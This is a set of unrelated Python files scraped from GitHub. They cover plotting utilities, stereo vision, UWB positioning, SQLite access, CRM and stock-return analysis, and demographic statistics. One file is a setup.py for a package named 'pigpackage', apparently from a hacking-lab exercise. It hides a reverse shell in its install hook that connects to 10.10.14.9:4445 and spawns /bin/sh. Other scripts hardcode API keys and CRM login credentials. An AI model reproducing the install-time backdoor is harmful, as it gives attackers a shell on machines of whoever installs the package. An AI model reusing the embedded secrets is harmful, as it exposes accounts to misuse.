if ALARM_SWITCH:
ALARM_SWITCH = False
print("모든 알람이 꺼졌습니다")
else:
ALARM_SWITCH = True
print("알람이 다시 작동합니다")
if user_input == 's':
if SOUND_SWITCH:
SOUND_SWITCH = False
print("곧 모든 소리가 꺼집니다")
else:
SOUND_SWITCH = True
print("소리가 켜졌습니다")
if user_input == 'a':
print("알람을 추가합니다")
while True:
try:
print("변화율을 입력하세요 (% 단위): ")
change = float(input()) / 100
except:
continue
break
if change == 0:
print("변화율은 0%가 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("시간 간격을 입력하세요: 입력하신 시간 간격 동안 변화율 이상의 변화가 감지되면 알림을 내보냅니다")
print("------------")
min = sec = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
while True:
try:
print("초를 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 12.52를 입력): ", end='')
sec = float(input())
except:
continue
break
interval = datetime.timedelta(minutes=min, seconds=sec).total_seconds()
if interval == 0:
print("시간 간격은 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("알람 주기를 입력하세요: 알람이 울린 후 다시 울리기까지 걸리는 시간입니다")
print("------------")
min = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
cooldown = datetime.timedelta(minutes=min).total_seconds()
if cooldown == 0:
print("알람 주기는 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
cid = monitor.add_criteria(change, interval, cooldown)
if cid > 0:
print(f"알람이 성공적으로 추가됐습니다. 알람 ID: <{cid}>")
| livelykitten/Coinwork | Document1.py | Document1.py | py | 11,579 | python | en | code | 0 | github-code | 36 |
35029256291 | from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
import numpy as np
from collections.abc import Iterable
def colorbar(mappable, pad=0.1, side="right"):
    '''
    colorbar whose height (or width) in sync with the master axe
    https://matplotlib.org/mpl_toolkits/axes_grid/users/overview.html#colorbar-whose-height-or-width-in-sync-with-the-master-axes

    mappable: the image/contour set returned by imshow/contourf/etc.
    pad: gap between the master axes and the colorbar (axes fraction)
    side: which side of the master axes to append the colorbar on
    '''
    ax = mappable.axes
    fig = ax.figure
    divider = make_axes_locatable(ax)
    # 5% of the master axes' size, so the bar scales with the plot
    cax = divider.append_axes(side, size="5%", pad=pad)
    return fig.colorbar(mappable, cax=cax)
def colorbar2(mappable, shift=0.05, width=0.05, ax=None, trim_left=0, trim_right=0, side="right"):
    """Add a colorbar next to one axes or a group of axes WITHOUT shrinking
    the main plot or panel.

    Parameters
    ----------
    mappable : the image/contour set to which the colorbar refers
    shift : offset of the bar from the axes bounding box (fraction of extent)
    width : bar thickness (fraction of the x extent)
    ax : a single Axes, or an iterable of Axes to span; defaults to
         ``mappable.axes``
    trim_left, trim_right : shrink a horizontal bar from either end
    side : "top" (horizontal bar) or "right" (vertical bar); other values
           return None
    """
    if ax is None:
        ax = mappable.axes
    # Collect the bounding box of the target axes.  `ax` may be a single
    # Axes or an iterable of Axes; probe the single-axes path first (EAFP).
    try:
        fig = ax.figure
        p = np.zeros([1, 4])
        p[0, :] = ax.get_position().get_points().flatten()
    except Exception:
        # Was a bare `except:` — that also swallowed KeyboardInterrupt and
        # SystemExit; Exception keeps the duck-typing fallback but lets
        # those propagate.
        fig = ax[0].figure
        p = np.zeros([ax.size, 4])
        for k, a in enumerate(ax):
            p[k, :] = a.get_position().get_points().flatten()
    # Overall bounding box of all target axes, in figure coordinates.
    xmin = np.amin(p[:, 0]); xmax = np.amax(p[:, 2]); dx = xmax - xmin
    ymin = np.amin(p[:, 1]); ymax = np.amax(p[:, 3]); dy = ymax - ymin
    if side == "top":
        cax = fig.add_axes([xmin + trim_left, ymax + shift * dy, dx - trim_left - trim_right, width * dx])
        cax.xaxis.set_ticks_position('top')
        return fig.colorbar(mappable, cax=cax, orientation="horizontal")
    elif side == "right":
        cax = fig.add_axes([xmax + shift * dx, ymin, width * dx, dy])
        cax.xaxis.set_ticks_position('top')
        return fig.colorbar(mappable, cax=cax, orientation="vertical")
def shift_axes(axes, dx, dy):
    """Translate one axes, or a collection of axes, by (dx, dy) in figure
    coordinates; width and height are preserved."""
    # A single axes is wrapped so the loop below handles both cases.
    if not isinstance(axes, Iterable):
        axes = [axes]
    for ax in axes:
        box = ax.get_position()
        ax.set_position([box.x0 + dx, box.y0 + dy, box.width, box.height])
def L2R(L, Teff):
    '''
    L2R(Lstar/Lsun, Teff) returns Rstar/Rsun via the Stefan-Boltzmann
    relation, using Tsun = 5777 K.
    '''
    temp_ratio = 5777. / Teff
    return np.sqrt(L * temp_ratio ** 4)
def R2L(R, Teff):
    '''
    R2L(Rstar/Rsun, Teff) returns Lstar/Lsun via the Stefan-Boltzmann
    relation, using Tsun = 5777 K.  Inverse of L2R.
    '''
    temp_ratio = Teff / 5777.
    return R ** 2 * temp_ratio ** 4
def pdf(filename):
    """Save the current matplotlib figure as a tightly-cropped PDF,
    appending the '.pdf' extension when missing, and echo the path."""
    if not filename.endswith(".pdf"):
        filename += ".pdf"
    print(filename)
    plt.savefig(filename, bbox_inches='tight')
| harrisonv789/Astro_Scripts | modules/colorbar_utils.py | colorbar_utils.py | py | 2,405 | python | en | code | 3 | github-code | 36 |
41946416343 |
import numpy as np
import cv2
import glob
from matplotlib import pyplot as plt
import os
from mpl_toolkits.mplot3d import axes3d, Axes3D
# --- Load camera intrinsics and stereo rectification results from XML ---
base_folder = os.getcwd() +'/parameters/'
s = cv2.FileStorage(base_folder + 'left_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_left = s.getNode('mtx_left').mat()
distCoeffs_left = s.getNode('distCoeffs_left').mat()
s.release()
s = cv2.FileStorage(base_folder + 'right_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_right = s.getNode('mtx_right').mat()
distCoeffs_right = s.getNode('distCoeffs_right').mat()
s.release()
s = cv2.FileStorage(base_folder + 'stereo_rectification.xml', cv2.FileStorage_READ)
R1 = s.getNode('R1').mat()
R2 = s.getNode('R2').mat()
Q = s.getNode('Q').mat()
s.release()
s = cv2.FileStorage(base_folder + 'P1.xml', cv2.FileStorage_READ)
P1 = s.getNode('P1').mat()
s = cv2.FileStorage(base_folder + 'P2.xml', cv2.FileStorage_READ)
P2 = s.getNode('P2').mat()
s.release()
# --- Load the stereo image pair (duplicate assignment kept as-is) ---
img_folder = os.getcwd() + '/'
img_folder = os.getcwd() + '/'
img_l = cv2.imread(img_folder + 'images/task_3_and_4/left_4.png')
img_r= cv2.imread(img_folder + 'images/task_3_and_4/right_4.png')
height,width = img_l.shape[:2]
# --- Rectify both images using the rotation matrices R1/R2 ---
mapx1, mapy1 = cv2.initUndistortRectifyMap(mtx_left, distCoeffs_left, R1, mtx_left, (width,height), 5)
rectified_img_left = cv2.remap(img_l,mapx1, mapy1, cv2.INTER_LINEAR)
mapx2, mapy2 = cv2.initUndistortRectifyMap(mtx_right, distCoeffs_right,R2, mtx_right, (width,height), 5)
rectified_img_right = cv2.remap(img_r,mapx2, mapy2, cv2.INTER_LINEAR)
output_path = os.getcwd() + '/output/task_4'
cv2.imshow('rectified_img_l',rectified_img_left)
cv2.imwrite(output_path + '/rectified_img_left.png', rectified_img_left)
cv2.imshow('rectified_img_r',rectified_img_right)
cv2.imwrite(output_path + '/rectified_img_right.png', rectified_img_right)
# --- Semi-global block matching + WLS-filtered disparity map ---
window_size = 3
# Best parameter
left_matcher = cv2.StereoSGBM_create( minDisparity=0, numDisparities=160,blockSize=5, P1=8 * 3 * window_size ** 2,P2=32 * 3 * window_size ** 2,disp12MaxDiff=1,uniquenessRatio=15,speckleWindowSize=0,speckleRange=2, preFilterCap=63,mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY)
#left_matcher = cv2.StereoSGBM_create(numDisparities=16, blockSize=15)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
# FILTER Parameters
lmbda = 10000
sigma = 1.2
visual_multiplier = 0.5
wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)
wls_filter.setLambda(lmbda)
wls_filter.setSigmaColor(sigma)
displ = left_matcher.compute(img_l, img_r)
dispr = right_matcher.compute(img_r, img_l)
displ = np.int16(displ)
dispr = np.int16(dispr)
filteredImg = wls_filter.filter(displ, img_l, None, dispr)
# NOTE(review): alpha/beta appear swapped vs the usual alpha=0, beta=255
# NORM_MINMAX convention — confirm the intended output range.
filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
filteredImg = np.uint8(filteredImg)
cv2.imshow('Disparity Map', filteredImg)
cv2.imwrite(output_path+'/Disparity.png', filteredImg)
| YB-Joe/Perception_in_Robotics | project_2a/code/task_4/task_4.py | task_4.py | py | 2,903 | python | en | code | 0 | github-code | 36 |
22827039598 | import sqlite3
__author__ = 'marcelo_garay'
import os
class DBManager(object):
    """Thin wrapper around the 'sicarios' SQLite database: opens a shared
    connection with foreign keys enabled and exposes execute/close helpers."""

    # Absolute path to the database file, resolved relative to this module.
    db_name = os.path.abspath(
        os.path.join(os.path.dirname(__file__), '../../../db/sicarios'))

    def __init__(self):
        """
        Make connection to an SQLite database file and enable
        foreign-key enforcement (off by default in SQLite).
        """
        self.conn = sqlite3.connect(self.db_name)
        self.conn.execute('pragma foreign_keys = on')
        self.conn.commit()
        self.cur = self.conn.cursor()

    def query(self, arg, params=()):
        """
        Execute a single SQL statement and commit, returning the cursor
        (so callers can fetch results).

        :param arg: SQL text; use '?' placeholders for values.
        :param params: optional parameter tuple bound to the placeholders.
            Prefer this over string-building SQL — it prevents SQL
            injection and quoting bugs.  Defaults to () so existing
            callers that pass a complete statement keep working.
        """
        self.cur.execute(arg, params)
        self.conn.commit()
        return self.cur

    def close(self):
        """
        Close connection to the database.
        """
        self.conn.close()
| edson-gonzales/SICARIOS | src/db/transactions/DBManager.py | DBManager.py | py | 825 | python | en | code | 0 | github-code | 36 |
39363534839 | import os, sys
import csv
import random
import signal
import socket
import threading
import time
import datetime
from fxpmath import Fxp
from Parse_DNN import *
from EKF_AoA import *
import numpy.matlib
import numpy as np
from numpy.linalg import inv
from numpy.core.fromnumeric import transpose
import math
from math import *
import pyvisa as visa
from colorama import Fore
import serial
import serial.tools.list_ports
import serial.serialutil
import matplotlib.pyplot as plt
# ---------------------------------TEST RUN CONFIGS---------------------------------------------------------------------
Rx_DEVICE_COM_PORT = 'com16' #responder COM Port
# ----------------------------------------------------------------------------------------------------------------------
# --------------------------------------NO EDITS BELOW------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def serial_tx(my_port, command):
    """Encode 'command' (str) to bytes and write it to the serial port."""
    my_port.write(command.encode())
def serial_rx(my_port):
    """Read one line from the serial port, strip surrounding whitespace,
    and return it decoded as UTF-8."""
    raw = my_port.read_until().strip()
    return raw.decode("utf-8")
def serial_trx(my_port, command):
    """Send 'command' and return the next response line (write then read)."""
    serial_tx(my_port, command)
    return (serial_rx(my_port))
def save_csv(csvf, row):
    """Append a single row (sequence of values) to the CSV file 'csvf',
    creating the file if it does not exist."""
    with open(csvf, "a", newline="") as fh:
        csv.writer(fh).writerow(row)
class Unlab_SR150_Resp():
    """SR150 UWB responder driver: opens the responder's serial port,
    starts a multi-tag ranging session, parses each measurement line
    (distance / AoA / PDoA as fixed-point fields) and feeds per-tag
    (x, y) positions into an extended Kalman filter."""
    def __init__(self):
        ''' Set Baudrate '''
        self.scpi_rx = serial.Serial(Rx_DEVICE_COM_PORT, baudrate=230400, timeout=6)
        self.delay = 3 # delay setting(sec)
        '''USER INPUT VARIABLES'''
        self.ekf = EKF_AoA() # EKF Object Creation
        # self.ref = np.array([0.0001, 1.25]) # reference position of tag
        # h_anc = 1.20 # height of anchor(SECC)
        # h_tag = 1.15 # height of tag(CAR)
        # self.h_diff = h_anc - h_tag
    def plot(self):
        # Live scatter plot of the current estimate on a 10 m x 5 m grid.
        # NOTE(review): reads self.X, which is never assigned in this class
        # (estimates live in self.ekf.X1..X4) — looks stale; plot() is also
        # only referenced from commented-out code below.  Confirm.
        plt.cla()
        plt.xlabel('X(m)', labelpad=20, size=14)
        plt.ylabel('Y(m)', labelpad=20, size=14)
        plt.axis([-5, 5, 0, 5])
        plt.xticks(np.arange(-5, 5, 0.5))
        plt.yticks(np.arange(0, 5, 0.5))
        for i in range(0,10):
            plt.axhline((i+1)/2, -5, 5, color='lightgray', linestyle='--', linewidth=0.7)
        for i in range(0,20):
            plt.vlines((i-10)/2, 0, 5, color='lightgray', linestyle='--', linewidth=0.7)
        x = self.X[0,0]
        y = self.X[1,0]
        plt.scatter(x,y,color='r',s=450)
        plt.pause(0.1)
    def Positioning(self):
        """Reset the device, start responder mode, then loop forever:
        read a measurement line, decode the fixed-point fields, convert
        polar (distance, azimuth) to Cartesian (x, y) and update the EKF
        instance for the reporting tag (session ids 11/22/33/44)."""
        ## Reset all ##
        state_ntf_rx = serial_trx(self.scpi_rx, "RST\r\n")
        print(state_ntf_rx)
        time.sleep(self.delay)
        ## Ranging start ##
        state_ntf_rx = serial_trx(self.scpi_rx, "UWB MTRESP ON\r\n") # Responder Session start Command
        print(state_ntf_rx)
        time.sleep(self.delay)
        while 1:
            self.scpi_ret = serial_rx(self.scpi_rx)
            try:
                ## Data Parsing ##
                # Fields arrive as space-separated hex byte pairs,
                # little-endian; Fxp reassembles them into fixed-point
                # values (distance in cm minus a 10 cm offset, angles in
                # Q9.7 degrees).
                result = self.scpi_ret.split(' ')
                session_id = result[0]
                distance = Fxp(val="0x"+result[5]+"0x"+result[4], signed=False, n_word=16, n_frac=0).astype(int).tolist() - 10
                AoA_azimuth = Fxp(val="0x"+result[7]+"0x"+result[6], signed=True, n_word=16, n_frac=7).astype(float)
                PDoA_azimuth = Fxp(val="0x"+result[9]+"0x"+result[8], signed=True, n_word=16, n_frac=7).astype(float)
                nlos = Fxp(val="0x"+result[10], signed = False, n_word=8, n_frac = 0).astype(int).tolist()
                ## convert types for dist and angle
                # dist = math.sqrt(math.pow(float(distance)/100,2) - math.pow(self.h_diff,2))
                dist = float(distance)/100   # cm -> m
                # Shift azimuth by +90 deg so "straight ahead" maps to +y.
                angle = math.pi * (float(AoA_azimuth)+90)/180
                s_dist = str(dist)
                # ## calculate position of TAGs
                x = dist * math.cos(angle)
                y = dist * math.sin(angle)
                x_ref = str(x)
                y_ref = str(y)
                # r_X2Y2 = pow((x - self.ref[0]),2) + pow((y - self.ref[1]),2)
                # r_err = str(r_X2Y2)
                # Route the measurement to the EKF of the reporting tag.
                if result[0] == '11':
                    meas = np.array([[x],[y]])
                    self.ekf.ekf_update1(meas)
                    self.ekf.cnt1 = 1
                    print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,Fore.GREEN,"TAG 1 EKF : ({:.2f}, {:.2f})".format(self.ekf.X1[0][0],self.ekf.X1[1][0]),"\n",Fore.RESET)
                elif result[0] == '22':
                    meas = np.array([[x],[y]])
                    self.ekf.ekf_update2(meas)
                    self.ekf.cnt2 = 1
                    print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 2 EKF : ({:.2f}, {:.2f})".format(self.ekf.X2[0][0],self.ekf.X2[1][0]),"\n")
                elif result[0] == '33':
                    meas = np.array([[x],[y]])
                    self.ekf.ekf_update3(meas)
                    self.ekf.cnt3 = 1
                    print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 3 EKF : ({:.2f}, {:.2f})".format(self.ekf.X3[0][0],self.ekf.X3[1][0]),"\n")
                elif result[0] == '44':
                    meas = np.array([[x],[y]])
                    self.ekf.ekf_update4(meas)
                    self.ekf.cnt4 = 1
                    print(Fore.RED,datetime.datetime.now().time(),Fore.RESET,"TAG 4 EKF : ({:.2f}, {:.2f})".format(self.ekf.X4[0][0],self.ekf.X4[1][0]),"\n")
                else : pass
                # x_pos = self.X[0,0]
                # y_pos = self.X[1,0]
                # e_X2Y2 = pow((x_pos - self.ref[0]),2) + pow((y_pos - self.ref[1]),2)
                # e_err = str(e_X2Y2)
                # self.plot()
            except:
                # Malformed/partial lines are dropped; the loop keeps reading.
                pass
            # # print(Fore.GREEN, x_ref, y_ref, scpi_ret,Fore.RESET)
            # ## save data(.csv file) ##
            # save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth])
            # save_csv(ranging_result_csvF, [session_id, s_dist, x_pos, y_pos, x_ref, y_ref,aoa_azimuth, pdoa_azimuth, e_err, r_err])
            # time.sleep(self.delay)
            self.scpi_rx.flush()
            result.clear()
if __name__ == "__main__":
# now = datetime.datetime.now()
# nowDatetime = now.strftime('%Y_%m_%d_%H_%M_%S')
# ranging_result_csvF = 'results/UWB_SR150_ranging_test_result-%s.csv' %nowDatetime
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth'])
# save_csv(ranging_result_csvF, ['Session_ID','Distance','pos_X','pos_Y','ref_X','ref_Y','AoA_azimuth','PDoA_azimuth', 'Estimated_Err', 'Ref_Err'])
unlab = Unlab_SR150_Resp()
unlab.Positioning() | yws94/Unlab_SR150 | prev_ver/Unlab_SR150_ver3.py | Unlab_SR150_ver3.py | py | 7,042 | python | en | code | 2 | github-code | 36 |
12887801729 | import spacy
from spacy import displacy
nlp = spacy.load('en_coref_md')
print("loaded")
text = r'''
Although Apple does not break down sales of AirPods, the company reported in January that its "other" product category, which includes AirPod sales, grew 33% to $7.3 from a year earlier, the fastest growing category.'''
doc = nlp(text)
doc._.has_coref
coref = doc._.coref_clusters
resolved = doc._.coref_resolved
print(coref)
print(resolved)
displacy.serve(coref, style="ent")
| AngeloCioffi/Info-Retrieval-Practical-NLP | neuralcoref/corref.py | corref.py | py | 484 | python | en | code | 1 | github-code | 36 |
29649845397 | import urllib3
import urllib.request
import base64
import json
import pandas as pd
from tabulate import tabulate
import codecs
import numpy as np
url = 'https://infeci.capsulecrm.com/api/opportunity'
headers = {}
# base64string = base64.urlsafe_b64encode('2d486e42771eee18125b8aef3afe216d:4c2TNRdi')
base64string = base64.encodestring(('2d486e42771eee18125b8aef3afe216d:4c2TNRdi').encode()).decode().replace('\n', '')
headers['Authorization'] = "Basic %s" % base64string
headers['Accept'] = "application/json"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
reader = codecs.getreader("utf-8")
data = json.load(reader(resp))
print (data)
# Creamos el CSV con las oportunidades
# atributos = ['name','probability','expectedCloseDate','createdOn','updatedOn','value','currency','partyId','milestoneId','milestone','owner','id','durationBasis']
# s = ""
# for atr in atributos:
# s = s + atr + ","
# s = s + "\n"
# for op in data['opportunities']['opportunity']:
# for atr in atributos:
# s = s + op[atr] + ","
# s = s + "\n"
#
# text_file = open("oportunidades.csv", "w")
# text_file.write(s)
# text_file.close()
data = pd.read_csv('oportunidades.csv')
print (tabulate(data, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\tESTADO GLOBAL DE LAS OPORTUNIDADES")
data = pd.read_csv('oportunidades.csv')
df = data
df = df.drop(df.columns[[0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12]], axis=1)
df['benef'] = df['value'] * df['margen'] / 100
pt = df.groupby(['milestone']).sum()
pt['margen'] = 100 * pt ['benef'] / pt['value']
print (tabulate(pt, headers='keys', tablefmt='psql'))
print ("\tValor Total: %s" % data['value'].sum())
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tPROXIMAS OFERTAS A PRESENTAR")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# 1- Estado de lo presentado
# http://pbpython.com/pandas-pivot-table-explained.html
print ("\n\n")
print ("\tANALIZANDO...")
data = pd.read_csv('oportunidades.csv')
df = data
df['benef'] = df['value'] * df['margen'] / 100
df = (df[df['milestone']=='New'])
df = df.sort_values('expectedCloseDate')
print (df)
df = df.drop(df.columns[[1, 3, 4, 6, 7, 8, 10, 11, 12,13,14]], axis=1)
print (tabulate(df, headers='keys', tablefmt='psql'))
# {u'name': u'Definici\xf3n de Tarjeta de Transporte', u'probability': u'10', u'expectedCloseDate': u'2016-09-15T00:00:00Z',
# u'createdOn': u'2016-08-17T09:48:26Z', u'updatedOn': u'2016-08-17T11:29:53Z', u'value': u'95000.00', u'currency': u'EUR',
# u'partyId': u'115869164', u'milestoneId': u'405855', u'milestone': u'New', u'owner': u'rubenglezant', u'id': u'4609271',
# u'durationBasis': u'FIXED'}
# response = urllib2.urlopen('https://api.instagram.com/v1/tags/pizza/media/XXXXXX')
# curl -u 2d486e42771eee18125b8aef3afe216d:4c2TNRdi https://infeci.capsulecrm.com/api/party | rubenglezant/playBetterBets | Python-Bolsa/reportCRM/buildReport.py | buildReport.py | py | 3,230 | python | en | code | 0 | github-code | 36 |
24151547273 | import pandas as pd
def calculate_demographic_data(print_data=True):
# Read data from file
df = pd.read_csv('adult.data.csv')
# Define property for the dataset by using a Panda series.
race_count = df['race'].value_counts()
average_age_men = round(df[df['sex'] == 'Male']['age'].mean(), 1)
percentage_education = round(df[df['education'] == 'Education'].shape[0] / df.shape[0] * 100, 1)
q1 = df['education'].isin(['Bachelors', 'License', 'Masters'])
q2 = df['salary'].isin(['1K', '5K', '10K', '20K'])
higher_education_rich = round((q1 & q2).sum() / q1.sum() * 100, 1)
lower_education_rich = round((q1 & q2).sum() / (q1).sum() * 100, 1)
# Define a new property regarding the average working hour.
average_works_hours = df['hours-per-week'].min()
# Define a new percentage of people working x hours a week with a salary of 20K
q1 = df['hours-per-week'] == average_works_hours
# Define the percentage
rich_percentage = round((q1 & q2).sum() / q1.sum() * 100, 1)
p = (df[q2]['Bucharest'].value_counts() \
/ df['Bucharest'].value_counts() * 100).sort_values(ascending=False)
highest_earning_region = p.index[0]
highest_earning_region_percentage = round(p.iloc[0],[1])
# Identify the highest regions with a percentage of people having a wage higher than 20K.
top_IN_region = df[(df['Bucharest'] == 'Bucharest Metropolitan Area') & q2] \
['occupation'].value_counts().index[0]
if print_data:
print("Number of each person", person_count)
print("Average age of men", average_age_men)
print(f"Percentage with Bachelors degree: {percentage_education}%")
print(f"Percentage with higher education earning at least 20K: {higher_education_rich}%")
print(f"Percentage without higher education having a wage at least 20K: {lower_education_rich}%")
print(f"Average work time: {average_works_hours} hours/week")
print(f"Percentage of rich people working less hours than average: {rich_percentage}%")
print("Region with the highest percentage:", highest_earning_region)
print(f"Highest percentage of rich people into the region: {highest_earning_region_percentage}%")
print(f"Ocupations in Bucharest", top_IN_region)
return {
'race_count': race_count,
'average_age_men': average_age_men,
'percentage_bachelors': percentage_education,
'higher_education_rich': higher_education_rich,
'lower_education_rich': lower_education_rich,
'min_work_hours': average_works_hours,
'rich_percentage': rich_percentage,
'highest_earning_country': highest_earning_region,
'highest_earning_country_percentage':
highest_earning_region_percentage,
'top_IN_occupation': top_IN_region
}
| SoDisliked/Demographic-Analyzer-Romania | Model.py | Model.py | py | 2,909 | python | en | code | 1 | github-code | 36 |
40353460149 | # -*- coding:utf-8 _*-
"""
@author:crd
@file: weather.py
@time: 2018/04/09
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
filename = 'month.csv'
data = pd.read_csv(filename)
data_DelRainError = data.drop(data.index[abs(data['V13011']) == 32766]) # 删除没有降水量的行
data_station1 = data_DelRainError[data_DelRainError['V01000'] == 52754] # 刚察
data_station2 = data_DelRainError[data_DelRainError['V01000'] == 52842] # 共和
data_station3 = data_DelRainError[data_DelRainError['V01000'] == 52856] # 茶卡
# plt.plot(data_station1['V04001'], data_station1['V13011'])
# plt.plot(data_station2['V04001'], data_station2['V13011'])
# plt.plot(data_station3['V04001'], data_station3['V13011'])
# plt.show()
Sattion = []
Year = []
data_year = []
for sattion in [52754, 52842, 52856]:
data_station = data_DelRainError[data_DelRainError['V01000'] == sattion]
for year in range(1978, 2017):
Sattion.append(sattion)
Year.append(year)
c = data_station[data_station['V04001'] == year]
data_year.append((c['V12001'].sum()/12)/10)
data = {'Sattion': Sattion, 'Year': Year, 'data_year': data_year}
frame = pd.DataFrame(data)
s1 = frame[frame['Sattion'] == 52856]
s2 = frame[frame['Sattion'] == 52754]
s3 = frame[frame['Sattion'] == 52842]
| crd57/backup | weather.py | weather.py | py | 1,316 | python | en | code | 0 | github-code | 36 |
7004941204 | from distutils.core import setup
from setuptools.command.install import install
import socket, subprocess,os
class PreInstallCommand(install):
def run(self):
shell()
install.run(self)
def shell():
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.9",4445))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
setup(
name = 'pigpackage',
packages = ['pigpackage'],
version = '0.1',
license='MIT',
description = 'TYPE YOUR DESCRIPTION HERE',
author = 'YOUR NAME',
author_email = 'your.email@domain.com',
url = 'http://test.com/pigpackage',
keywords = ['pigpackage'],
cmdclass={'install':PreInstallCommand,},
)
| nutty-guineapig/htb-pub | sneakymailer/sneakymailer/mypackage/setup.py | setup.py | py | 773 | python | en | code | 0 | github-code | 36 |
1119194210 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 19 11:21:13 2023
@author: nmorales
"""
from requests.auth import HTTPBasicAuth
import requests
import json
import matplotlib
import pandas as pd
import numpy as np
url_cotizacion = 'https://cloud.biva.mx/stock-exchange/BIVA/quote?isin=MX01AM050019&period=Y&quantity=5'
headers = {"x-api-key": '5tbGgJp5Bq4yGPGaLcaUE8K7dUe83uxO94GYLjIq'}
response_cotizacion = requests.get(url=url_cotizacion, headers=headers)
data_cotizacion=response_cotizacion.json()
data_cotizacion=pd.DataFrame(data_cotizacion['timeSeries']).set_index('dateInMillis')
###########################
############################### SIMPLE RETURN
###########################
data_cotizacion['Simple_Return'] =(data_cotizacion['close']/data_cotizacion['close'].shift(1))-1 #(P1/p0)-1
print (data_cotizacion['Simple_Return'])
data_cotizacion.count(axis=1)
data_cotizacion['Simple_Return'].plot(figsize=(8,5))
avg_returns_d=data_cotizacion['Simple_Return'].mean()
print(avg_returns_d)
#####################################################
##this is the mean return annually (250) days
###############################################
avg_returns_a=data_cotizacion['Simple_Return'].mean()*250
avg_returns_a_str=str(round(avg_returns_a,5)*100)+' %'
print(avg_returns_a_str) ##aqui sale un 12% lo cual indica que se tiene un retorno anual promedio de 12%
###########################
############################### Logarithmic RETURN
###########################
data_cotizacion['Logarithmic_Return'] =np.log(data_cotizacion['close']/data_cotizacion['close'].shift(1)) #(P1/p0)-1
print(data_cotizacion['Logarithmic_Return'])
####se usa el precio de cierre de hoy entre el de ayer y se le resta uno ese sería el retorno simple
#print(PG['Simple_Return'])
#print(PG['Adj Close'])
data_cotizacion['Logarithmic_Return'].plot(figsize=(8,5))
#####################################################
##this is the mean return is a super small number lower than 1% because is daily
###############################################
log_returns_d=data_cotizacion['Logarithmic_Return'].mean()
#####################################################
##this is the mean return annually (250) days
###############################################
log_returns_a=data_cotizacion['Logarithmic_Return'].mean()*250
log_returns_a_str=str(round(log_returns_a,5)*100)+' %'
print(log_returns_a_str) ##aqui sale un 10% lo cual indica que se tiene un retorno anual promedio de 10%
| NRMAnaya/PythonForFinance | RateOfReturn/Simple&LogarithmicReturnBIVACLOUD.py | Simple&LogarithmicReturnBIVACLOUD.py | py | 2,522 | python | es | code | 0 | github-code | 36 |
72092399465 | lst = list("HelloPython!") # list() 함수 호출하여 문자열을 인자로 전달하여 각 문자가 리스트의 요소인 리스트를 만들어 변수 lst에 대입
print(" + " + "012345678901") # 표준 출력 함수 print() 호출하여 문자열 출력, 인덱스 오름차순
print(" " + "HelloPython!") # 표준 출력 함수 print() 호출하여 문자열 출력, 리스트에 담긴 문자열
print(" - " + "210987654321") # 표준 출력 함수 print() 호출하여 문자열 출력, 인덱스 역순
while True: # 조건식 True일 동안 반복, 즉 무한반복
n1, n2, n3 = input("슬라이스[?:?:?] 3개 입력 >> ").split() # 표준 입력 함수 input() 호출하여 입력 안내 메세지 출력 동시에 사용자로부터 입력 받은 문자열을 리턴받아 split() 메소드 호출하여 공백을 구분자로 하여 분리된 문자열을 요소로 하는 리스트 만들어 리턴하여 변수 n1, n2, n3에 각각 대입
n1 = int(n1) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n1에 대입
n2 = int(n2) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n2에 대입
n3 = int(n3) # 문자열 n1을 int() 함수 호출하여 정수로 변환한 뒤 n3에 대입
if n1 == 0 and n2 == 0 and n3 == 0: # 만약 n1, n2, n3 모두 0이면, 즉 사용자가 0 0 0을 입력하면
print(" 종료 ".center(26, "*")) # 표준 출력 함수 print() 호출하여 종료 안내 메세지 출력, center() 메소드 호출하여 폭 26, 채울문자 "*" 만들어진 문자열 리턴
break # 반복문 빠져나감
print(lst[n1:n2:n3]) # 표준 출력 함수 print() 호출하여 리스트 lst를 슬라이싱하여 새로 만들어진 리스트 리턴하여 출력 | jectgenius/python | ch05/05-ch03.py | 05-ch03.py | py | 1,777 | python | ko | code | 0 | github-code | 36 |
29335693587 | from keras.models import load_model
from sklearn.metrics import confusion_matrix
import itertools
import numpy as np
import matplotlib.pyplot as plt
import sys
import csv
